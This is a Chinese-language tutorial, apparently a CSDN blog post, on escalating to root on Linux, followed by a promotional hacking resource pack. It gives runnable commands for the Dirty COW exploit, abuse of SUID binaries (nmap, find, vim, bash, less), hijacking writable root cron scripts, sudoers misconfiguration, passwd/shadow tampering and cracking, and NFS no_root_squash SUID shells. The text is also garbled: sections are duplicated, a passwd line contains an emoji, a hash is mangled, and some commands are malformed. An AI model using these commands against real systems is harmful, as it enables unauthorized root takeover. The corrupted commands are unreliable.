1、内核漏洞脏牛提权
查看内核版本信息
uname -a
具体提权
1、信息收集配合kali提权
uname -a #查看内核版本信息
内核版本为3.2.78,那我们可以搜索该版本漏洞
searchsploit linux 3.2.78
找到几个可以使用的脏牛提权脚本,这里我使用的是40839.c脚本
那我们把这个文件也进行上传
然后在我们反弹的shell上查看,发现上传成功。
我们可以先看看脚本
利用提示对脚本进行编译
gcc -pthread 40839.c -o 40839 -lcrypt
运行然后输入密码即可
接下来我们通过
su firefart #切换用户
2、利用linux-exploit-suggester、linux-exploit-suggester-2等工具
linux-exploit-suggester
linux-exploit-suggester-2
2、SUID配置错误提权
SUID简介
1.只有可以执行的二进制程序文件才能设定SUID权限,非二进制文件设置SUID权限没任何意义.
2.命令执行者要对该程序文件拥有执行(x)权限.
3.命令执行者在执行该程序时获得该程序文件属主的身份.
4.SUID权限只在该程序执行过程中有效,也就是说身份改变只在程序执行过程中有效
SUID设置方法
1、chmod u+s FILE…
2、chmod u-s FILE…
具体提权
SUID可以让程序调用者以文件拥有者的身份运行该文件,当我们以一个普通用户去运行一个root用户所有的SUID文件,那么运行该文件我们就可以获取到root权限
常见Linux中root文件列表如下
nmap
vim
find
bash
more
less
nano
cp
利用如下POC
#以下命令将尝试查找具有root权限的SUID的文件,不同系统适用于不同的命令
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000-print2>/dev/null
find / -user root -perm -4000-exec ls -ldb {} ;
各命令提权利用
nmap
旧版本的 Nmap(2.02 到 5.21)具有交互模式,允许用户执行 shell 命令。由于 Nmap 位于以 root 权限执行的二进制文件列表中,因此可以使用交互式控制台来运行具有相同权限的 shell。
nmap --interactive #启动交互模式
nmap> !sh
sh-3.2# whoami
root
或者有一个 Metasploit 模块,它通过 SUID Nmap 二进制文件执行权限提升。
exploit/unix/local/setuid_nmap
find
实用程序find可用于发现存储在系统上。然而,它是执行命令的能力。因此,如果它被配置为使用 SUID 权限运行,那么所有将通过 find 执行的命令都将以 root 身份执行。
我们拿到一个非root权限
touch abc
find abc -exec whoami ;
vim
Vim 的主要用途是作为文本编辑器。但是,如果它作为 SUID 运行,它将继承 root 用户的权限,因此它可以读取系统上的所有文件。
vim.tiny /etc/shadow
还可以通过vim来打开shell
vim.tiny
# Press ESC key
:set shell=/bin/sh
:shell
Bash
bash -p
bash-3.2# id
uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)
less和more
less /etc/passwd
!/bin/sh
3、计划任务提权
系统内可能会有一些定时执行的任务,一般这些任务由crontab来管理,具有所属用户的权限。非root权限的用户是不可以列出root用户的计划任务的。但是/etc/内系统的计划任务可以被列出。
利用命令如下命令列出一些计划任务
ls -l /etc/cron*
cat /etc/crontab
在发现有一些计划任务时,我们就可以去检查是否存在一些问题导致权限的提升
权限配置不当
首先我们拿到一个非root用户的账号,我们通过一些其他的手段提权都失败了,这个时候我们查看了一下计划任务
cat /etc/crontab
发现存在一个root身份运行的test.sh,那我们当相应的目录下去查看一下这个计划任务
cd /sbin;ls -l test.sh
发现这里权限配置为777,就是说我们普通用户也能去修改这个test.sh文件,那我们对文件进行修改,然后进行提权。
cp /bin/bash /tmp/bash; chmod u+s /tmp/bash;
接下来就到/tmp等待计划任务的执行
产生后对bash文件进行执行即可进行提权
4、sudo提权
普通用户一般是无法运行root所有者的命令的,运用sudo可以使普通用户使用root用户的命令。但是在一些场景下,管理员为了平常运营方便给sudoer文件配置不当,从而导致权限提升的问题产生。
一般情况下,我们使用sudo命令都需要输入root密码
管理可能为了方便对/etc/sudoers进行编辑成sudo免密码
vim /etc/sudoers
添加:test ALL=(ALL:ALL) NOPASSWD:ALL #test为我们的用户
添加后我们在进行重新进行读取
5、明文root密码提权
大多数linux系统的密码都和/etc/passwd和/etc/shadow这两个配置文件息息相关。passwd里面储存了用户,shadow里面是密码的hash。出于安全考虑passwd是全用户可读,root可写的。shadow是仅root可读写的。
当我们的passwd和shadow一些权限配置不当就可能会导致提权
passwd文件
test❌1000:1000::/home/test:/bin/bash
passwd 由冒号分割,第一列是用户名,第二列是密码,x 代表密码 hash 被放在 shadow 里面了(非root用户不可读)。
当我们的passwd文件给普通用户配置了写权限,那么我们就可以通过修改x为一段已知的密码的hash值来进行提权。
shadow文件
test: 6 6 6Mqh9T8ip$4Ev.HJTBdyobrYaW/KzBlL0yx6wefeB.VDcE7KiDiwoUvGkqShU9jRK4cEZA2kBRsyH2fWjmbxc/ZyVWfXwFJ/:18849:0:99999:7:::
假如我们对shadow文件有读取权限我们就可以利用hash、john等对其进行爆破
这里以john为例进行演示,首先把passwd和shadow两文件放在同一文件下
john --user=test test.hash
6、密码复用提权
当我们获取到一些如数据库、后台 web 密码,可能就是 root 密码
7、第三方服务提权
netstat -antup #查看各种网络服务
1、NFS提权
当服务器中存在NFS共享,且开启了no_root_squash选项时,这时如果客户端使用的是root用户,那么对于共享目录来说,该客户端就有root权限,可以使用它来提升权限。
①查看NFS服务器上的共享目录
sudo showmount -e x.x.x.x
②创建本地挂载目录,挂载共享目录。使用攻击者本地root权限创建Suid shell。
sudo mkdir -p /tmp
sudo mount -t nfs x.x.x.x:/home/test /tmp
cp /bin/bash /tmp/shell
chmod u+s /tmp/shell
③回到要提权的服务器上,使用普通用户使用shell -p来获取root权限。
2、数据库提权(篇幅教长,后续另起篇幅)
①UDF提权
②MOF提权
③启动项提权
④CVE-2016-6663、CVE-2016-6664组合提权
1、NFS提权
当服务器中存在NFS共享,且开启了no_root_squash选项时,这时如果客户端使用的是root用户,那么对于共享目录来说,该客户端就有root权限,可以使用它来提升权限。
①查看NFS服务器上的共享目录
sudo showmount -e x.x.x.x
②创建本地挂载目录,挂载共享目录。使用攻击者本地root权限创建Suid shell。
sudo mkdir -p /tmp
sudo mount -t nfs x.x.x.x:/home/test /tmp
cp /bin/bash /tmp/shell
chmod u+s /tmp/shell
③回到要提权的服务器上,使用普通用户使用shell -p来获取root权限。
2、数据库提权(篇幅教长,后续另起篇幅)
①UDF提权
②MOF提权
③启动项提权
④CVE-2016-6663、CVE-2016-6664组合提权
⑤反弹端口提权
关于黑客&网络安全学习指南
学好 网络安全不论是就业还是做副业赚钱都不错,但要学会 网络安全 还是要有一个学习规划。最后给大家分享一份全套的 网络安全学习资料,给那些想学习网络安全的小伙伴们一点帮助!
内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础等教程,带你从零基础系统性的学好网络安全。
1.学习路线图
攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。
2.网络安全视频教程600集和配套电子书
观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
温馨提示:篇幅有限,已打包文件夹,获取方式在:CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享
3.技术文档
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。
4.工具包、面试题和源码
“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。
还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取:CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享
最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。
这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。
参考解析:深信服官网、奇安信官网、Freebuf、csdn等
内容特点:条理清晰,含图像化表示更加易懂。
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取:CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享
